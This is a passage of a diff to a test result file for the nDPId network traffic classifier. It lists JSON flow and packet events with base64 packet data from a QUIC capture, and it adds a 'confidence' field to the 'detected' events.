zEmBqIR7303kSG5qzr5TLI3S+HsomuNljUiJcLhPennjdx7lzykZLApkNqdXohn6cMLNWawEq2vbg6QuuGD5qyFkpNZTZlU8uAHtpVJ6PR8rOhIURj1C7nmD2CZtZldkk7jy284c\/v0cTFyeXTlazrNC5FguNM8mQtfcjJeoRBgpM91eZLLODlcjL1P9tpCLmn9Socs7Q01T2rkvjPV0716n64nRa49vunAqoY5G0f+iJstXQKjrKL1O19hveBusaLAMf3k7esjVnHjtEFlZNWENT0AHE9vZ45PqMxHl97AMxGE1Ey++DiK2nswhT1oOP5K+MSP8LTUT8gmGcQuDngWuHVMtTenYrRPM5"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -189,27 +189,27 @@
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1621433005013,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433005013,"pkt":"AAAAAAAAAAcAsxf\/CABFAAVil6tAAEARnbXAqP4LqE6ZJ4k0AbsFThpVwP8AAB0IZRm3OuXdodgAAEU0ssTnI2C5JTpJ7y484Fn11oOKDy1JlfEyAX6Ahkv2Zo4OuAkEIohPGoaBHToYLM+P+WJUX+\/Cx7tkDHSXu6uphHZEOGBHmbdUhEa31U3TrNufu9mq6Qj3es8x44mT60\/f25coknN4f1asGblw6iEV1UtSpKMZaOs\/Xn05i9jEBkmhLNqDiktkJ4wwKu6eDxhG6VfLGYQN0Nd18mF97QnMWVWto+p42IfXZbxYSsRmanu+ilVlO+oFCT5a\/R9Dt+6n3rqrFuIxLqTN6rjt10GoO\/\/lvMLrXeyHTYVfDmtLHFSomxcrpQ3r6eIc\/i4bL2wJjBHSTqeCFHn34cWF\/KUdra327rirXnBA\/7qtlzjYwUqqXpMeU06gm6+dAJeS+a55i\/iSqTqtrz20+u7ZIKLbJOhNJP6eJyDr4dCdENdXp1Fo+RvNoazaCsibyYSNV21GcFTzdJdaAp+DcgmVuOqynNS+9YRbKxw\/5tALw7bDdUy189V3QJUm\/7eodDeLzAxTU0ecTeCtBoRV6Wg00hEmo77VajiQh+S9i4nbzRbAGk3ddKNqZC3nSakSP6Mm39WZ9XZ2DSCUBtbOz1EnZK6eDSyw3kFY8N3QSNiaiSeJfa33Sokfyq3JCk8UnjuMqQyCqe2oeMj9pjHd8z5tFKOU+7OZzkA\/yQ7JVv9cFs9+5eYZ4cKFz9UVTSQT0XDPHR4RXhdh+bwJsc9s3QG7laDs6sjDff1OOdIw+HQvW4J9j4BHeEjv5EX8iWWHhElmMuawXMu41RoYajwI8TvfiJwokixmW4yjJof50jF95ax2qGzCJFu+R9a+5BttXBh\/HgnlXdP0TqNiuxyOJzh2lYvo4XC+o1iVVoZbKKo29cl1g0ROFSenQ6plougEal5XbLsvgz1yDGwthS+cZxXIzwxF8Eg5YJQAhTRX61XoObnpc3wjyuzhjohKkihqglhF+YzQsZk375xH7l8SvAlGAlhbaqyzvg5BgzZRh6okkrQOneu5ObvEyajk7xJ1B4hskZiOxnZ0noPwZBTF2QPMuYYm+MCxH46tot+xZ66piECmxmki024ptldWuOatYmRe+vTjmyyX1YPL4JCVDC40p742+pLSe\/iwjJkZAnjQmTnvKGie\/1BU5Wr+49RbkkhlQj87GarVPAL2uWWkqFe2Xngd1FbJvcDFFkuK1dxqsHpPZkmRC96zjmBFDteeGuqwR2lMo3UjjF2OCNSmVipO+iUOCkltuf8TJWxs7tEHUrqAVXcOfh5I8BPOIikZ3dfkJLmZ2FbI0TTtjsGhNskYmpIQ0PlvPIV7kAS3z0gwBKaF1FnV\/xQ0OCEM7TJqhVOfiW\/+wkoA3mujBfVH\/wOmSvWqW48vFIffH3djYRV7X32psbHY61g0HRIXjeXvXr8Qqc6kOM7tKBgVpXPFeJ07yr5RtFibyMmbpJubKIOxOd2PNf\/UyTLqOCr\/EZQqRA34kT\/VbsSrwcgR6YhLifHRelRWGH\/E0Pa9ov+0yS6KH5C1eU4IuTLa8OWBrTOYGLQu8Tu0ZuJyhcfyGs1ESpNH7K8z9wJSLmfAfovUdPKdJaXA4eVpJ3b6rEyriccdcLge1eKHdQyp3T\/AsTnrrAUQoHmrYyzAM8GsuQbvKlbfByymbHOPuwfI9YUmrFGuBKrB3X9vWARNEbMs2uicMz1oh0SQfb2Ug93LkY\/XDhxl6y6ruCuCMjHk9YF6+XgKvBLgShKGnzgcDJqqw32S355No+iSbZZxAos\/DatV1Zsga3TJckyQKORE"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1621433005304,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433005304,"pkt":"AAAAAAAAAAcAsxf\/CABFAAVil6xAAEARnbTAqP4LqE6ZJ4k0AbsFTtY8xP8AAB0IZRm3OuXdodgAAEU0cISfGNFL6Nfe8IXrcMcB0WwE+45y84o5jFkQ+EdHDqq0hRKmpjiqPPzi8JXkbGCFDae5uvRs2ByaSWejf137f0JY1fl3AeVjkq6PaQWDhduni\/8xLvtEbqFj4AqrhXB9TLrxV5LvP+0mGlJValwLeXYCkQ1e94uqm\/qbFL9zYlqDWYM9BIIViTH9xhJud\/SLw5JuUvIFaOQAu8OmZpUxq1bUd8xSmpOSKiHypmGgb39a7H+T1KVpPR+aUixKS4GeMMK2PAyd+OEGJMuz6qZJGatj+7v0DncaR5EgoSYycOF\/vja\/rdaJ\/YdRvp+BmrQNiM9k5UwjpTPFz+b8892Qzvimnfslx7R8GKQ9PAsv\/Tg24GHiB5jPl\/cYxqB7qj\/Z4RDwUJUIkT1A6um69Kq3NVgu5rAWDw3wRgcQ30gaG3co1yGCHL7BlNpgYFxtc2sG95hPofeQcZ7RmqBI8vbZsdcgEG9pwZXnghf+i9JkdOOyHhmNzU7FhBVpm886Oc7ESE5xd3wpyFyKJ5wKdEwsRtMCPYdLRf0ABAJjDpcG31xcGIVXa+iXmHdKqZaaFXdkzl+G5GyXaENB\/bBYFVR+uzivE3jfVyYnP5o6mkMgHmF4stkzuFXNhTUCQtT+vOWJOY0OKBIRfSRrLMayp1BWBk48bLyItA0l5w22EpO2xW\/My4wjTeC8gEVd09+5dNMt6iJUTON1ZAqvZHzSmdehef4+4mQl\/8x7+EsRKAIMAJ0j+\/iccKVsAFRvylLUI9xTbdrbwMgSdNlLvjtGyuPM+WW8Sz0Fphz5qliTbHpDUhw2MYDjzqo8p1eq2A8b9Wtx0Fg9PeEdOHEHN6JR93qNQ8Qm\/Zs+yaxclMgzfrz0njPpBZWm5TuoqFpmRrNgNmlZsI4vJE5izzoxbqOc+XwyaqSy74943ljvUMQ\/ZeoktJ4guJVMIv881KZyYNXdWP8XlvelQTRxmIHmrk8WULu5C89ykKYnsXobDBaYsX50pAVggD11aUXtJrh1N\/dVOKdnYucGb7Q5ArZbw6g65fAovdJY61FZZYMTsGeir2LCxh1AxApj3NMBJNeCfN35DoXwcNt+D8w2\/aSTQe6Lgqdlrl17h5TVhrBdY2EwKzbkiScpw58VyUeZdOFiVtIYClAYFglMWlD3NA05mjWkzv1JdL5VrS3h3MfI2xs4zN3+TLmvqItkAlOxTuNKnFQ6PMzhbtiE9pIRBeo7GRWe\/s3sXYSAgTQMeTwcALlYXW1XrTrXea37yWgn6qd6pcye8lKgZfbrjRMCVrOgARQ5+uLTdXLZffiqEHvPYwWFKcJtCjG2DNK7rUYqQnnhv4Wl7a9aDSnxFpvuZBqMtbV6dwRwh3nVBQCEW8tbmselh+vdecmFi+9yIQLpr\/ttp2HjIMzaof+HymOhd7VNiP61ZWKFd35OLow7F6RAlIa\/iMODRCCPy5rCPJ8Och0DWA\/AImeyu3i34G1KgGADjIpQoQOwOKh1KxRKIqPxHA83lNc0T2MvGmebHLNWLrdwsMvVJ+OOdOddVjrpUtFqYOdTOSyKkfGy+z3ggq11AbCjGSCRIXFWOTVgFonh1\/ejWrgnzhzvTVkzsdfazaZm1Nq7y3TI1Ff7GWqkisOa2duQbw0SwQHSDsh9Bynr6GVmyLYxcmpSTtCvxHuQF4wCoYZxuD709QVdI5mDD3SUUMavLX5H44VXuJkLmJC1t\/WhlhpH2ChjFQT1wbqIPa1XxtXfyl+1hhcd+xzhaw9Y6FS3fdwXN19AFoGQ"}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1621433067725,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433067725,"pkt":"AAAAAAAAAAcA4umACABFAAVi1OtAAEARtzjAqP4LdZR1HseDAbsFTtZ3zP8AAB0IpPhj4m4ZUDEAAEU0Bbm2MdfcBkbBAPPSjVV7TSr2o29Fu0JZdgmdGfjVEVdDmbG+dqC+JAbzKNxQpRoBCsz4rRvvwiop1np5APZ9Ov1gMJcSIiHQncQkBtDWz+J2o6GAqwAVkZk1FxBkffl8czPnYy8dHsU5KXYYOyBtpfhC+IT7ePszMtE7GlrZvCnH23HBzZ7GxSIxR9YFrG6h4PldhiWirrW6fHFgo\/piSndGDtWSJ+EYJdFyOMLk8LdIhNJ\/bJX3nYw329gRY5r\/poWNl5g71rBp4iz\/aiTDNDMAfcg1ExHdPviw2IK9f4W8pMDMvDI9FexzuJfBX9eRklkzssGGPyOnF+xE6997bLBbI4Vi9+gpQBFCCwYHdZ8Yt0Gussz\/f9ErkfzoPii85d0vfFh+DB5q2D4txvr1h4E4SDVIPFbk3TFJy\/7UXDNbvXXIm5xIqlq3grZZAsNicHGKes2+rw5ypULifO33QhqTPaSFb\/jQn6NyP3WJTRP9i0U0VPYsdYu3f0K5pfJOPF\/8gAxIuhKlFGtGv9GRMlzIpV1F1p2d9+\/vUuadZOiX\/Db7H96lha\/Okr2QtWcz\/SSoJEkbKYVqBS3RDAbbB4X6mN4n9Ft6hAcQJheC2GFXuEAFotpEq4XY1B+2WcU1cIEKgkoBaRv5g1\/LOKnYzLT8SzL1UVFovVGYHn+X0THvNtuJ957AYrKYcqgN\/SUJSPHzmoZoWGO\/q5y19X4WfC481zRO79sZO31h6Dk1na9B\/hYqG\/CxAXd1s5xBzDA8OS5TnaqusIzCxer4zV82fnF7VoQtDopVZNTsoDAIpt6cW+fAinlqYRRovLmToeikcLMo8c8\/6+0XN4C\/sNxwObVZ\/O5C\/emTkAyuRrduScc9vJaxAO9Dl74qqMHIMLFex8KQIDCh6G1NTs3194S8k5vVSQvmLDPRNPbXzBD1\/e\/+7+rmJqGUOcdbTOlX0fkuR4DB14HEvju2C2b9RxC4VpxeWcvtcIqUvnsdf+10RtMvVEY1H8oIRhd\/40\/JOM1RwnJAya+YM9Lojxag2aYSWUlQyopt5V+r8YPszgD2PyRsBJhXDMRUFIuIv2\/u0jmGfN1IMWtAf4wKiwoSQdAMV17hTocy61LlAkDEtIzfOpKoBNjr1FJvgoLlUR3p6HPRjORhAJzdHC7IByfP3Hxhs3ctG3V\/7BQQoSKFTrGH3kjhrfgHIt0HEkl96gVcUPsmn4EtE2VI+GcXfV\/ANkKoUFr3NCaUGtMncqVP\/YjZZJ+QcMW41L0RZUgzIT928lTjcFEypXkCRrlGtP+rWWXE7mFYXiNfnrIK3QAi4gD88L8LjTWDuvcPu8biICw9pEbLTHY1O7PpcQj\/JJ82HVYLYO58O++NchQ\/rgmiClydF0i\/JID1L1diJjMl1iYMV77lfb9Nvv2HfL8j7cDz55Alfw6pwUDnb8QeDwc\/a6xAfyz4uojy4vrCkJfYZreW9P4NFSgKnEX7HwNb6i1ZjiVei7dVFeH9afC69DsshYJ7L0fYFE5rREPVfqmcWx57T\/mQmdAf1+07k2CuNu6sNtY+XS6xOdLTWbSkcX50J5GTkvJhnKHxtmGLG8CoEfmdvM4NCU9jEGSExH87\/iWlXlfjYuUfmvFjsKZOzqUkQ2sUkhZw7BFVNd3HF7fUsilfRlk2t8MaAx\/EEndDgdYNK0EgdXbFzOIIeK6IAbpmYeX7gNdesbdzVQ6uz6TCcVrRcKuxoreJi193vTD2D8+SLe1fOItmTtr9WoqXkb1GjhybS\/sPn+TL"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1621433067996,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433067996,"pkt":"AAAAAAAAAAcAWlu1CABFAAVi1TJAAEARrlvAqP4LV7OblcIZAbsFTjBdyP8AAB0IGttMWxhOAgQAAEU0E0iR2uQV7+gKMUMCJ94a1mUs9WxU6Tkmya1QT1ijZpDLW3h0qsyJnE7yi5XMKbMLZQG0VI0E4CnL4699UzuXHbmZG4j1bpQxuVn5yALot0dTMdquwfkg43GEM1wkpQgrsMTP0qTEcaLbJ4i4VFKwOqxnROj3ts8Q5YEHHDel6ycIKIRhevOZCj2WbWLu59h+nwbW8hRv73Od8cN4+kjzfuGe+B1zZiO+ZdX3XLy2RMy5S4kzUgTJnM6eihuCfOyH9C1kMvBrE6eF+uvUY6g2SL73pAnMQ8F3ZxMjAvnHhyJJDNucS6II1cpdPCb4Nk6lW166dZJrTlpxEptf9MOeoGPoI7T8kuqmrwllZaRI4XQ\/kKSxUPBWGaQQMJydqLl6\/T1lDk6eOI6jqnm\/GdP90hCcoCmDPrWgZe22++LHPGXmbsr3YOCDa1nIhq8ftKY33OkoptIbA8RVngOr1lQUcMQQ\/VYFKWd7j8gKOuzuJU4SGqvnkK6Wj6e+C85olkBIqr+FP9UVpBEPptprLjMH\/pqncDJZ5yEh7Grdurgenn8Oa1UCeREsY9XCcMK5LJG0GEGg5FgT1KKRue2Z3g1vuP3LjKlHlZ6ysoHZipHIwWeDZcFGaN8c7Ipp75Aj4UWNvtREE2z3pxKUeu\/3ZyZ1sgWETUpVlXcSVvotMQ5TZwvAGbXANNu\/rhz1tvjUpV2Gbr3iMVknJ312hfpRnkJ0phBBW7yPgZMi2pP2LGIwP70mvVJhdiKKMoWgQ2K6uSPzHShiYyWZ9wfqSuCt4GrPH2Dz+sYRk9GjWlWo38XlQSZByhfvHyMDGY\/VwkRy7DGiQWpLBPaI32qcs+0Wi5UhL0chKc9MuYtE2kBrFhu\/MmzxgILiKu9g1WiLecrRs+SiPafnawwXaxRH3UnKyKEbs9tf7cxaGwTFwQbItBr0May5hHbw7VijZr\/F9HknAkXN+WQzfw2IZkbx63CHzTxn0Lf0\/gAteNoZtUoQnGHEWYD7yIoAOl+XtxktZ2WH8ilBnJI532y+PhOHWg7vFNIZYy2XNI7Ro8rUoGLA7ZyBrhYAPGV\/NOjp8U6D1metWriDzDxh0ozJasZzk0JYSqpovUTh5xgdlDtecRDUNdlTAfjBnyMbf+cFYTPnowHg7\/FY4RR3Q6\/UygV+NcMVkjaTNaDNXvagiuVZXLNIb4Tk3A2V3EqgUkxJl3ru+va\/80OsxasM4dazYUBuVN1MBNdZhpkRBKIit9QjLPAJB6wcXxf+0p+d0gN55St3hQi8gb\/iL9k\/onbQhxFP89onbtuDFXRyUSTM8tQq5CBj7L4VyNmcLHxtw5p3RXU70Uk+0psZnI2HJXq3ccqQUlNOGe4V57sFTrkyJUpugmAdJl2lStMmlzn5NM6S8FjEz0Mv23EdQvL2Xv8xQtAJ82kaQeAQu+skCfiHwl2eE0HR0kpuVdYzC4577xLkjxLKoUO64A52BANzmrvYZyO1d0UbSchYHinUiE32BfXi+lFE2EkQL8c4oFSQkavwjhteXk5z9herUfnERT404lCm6CiO4Z5gG+k6w2kpWoipnHtRYOjO897tsBk6rLYOHvEuLqjnZuhXbn3m7joNX5Nd\/3Q65iq8R5w3zlVfzVIw6SZdhLY9l5ctDa9JFYiC9MK\/ietRcrprlPxUIwhQEDdSRUda3EJD\/9M9hmP+CaD+tbS38jpu\/LbnTrforILNg1cv1A+sXeT03E966mAsy1Ec1mrv8LqFR9Ep7nyOUg5\/wWMujj7+qgzOoMXZ"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
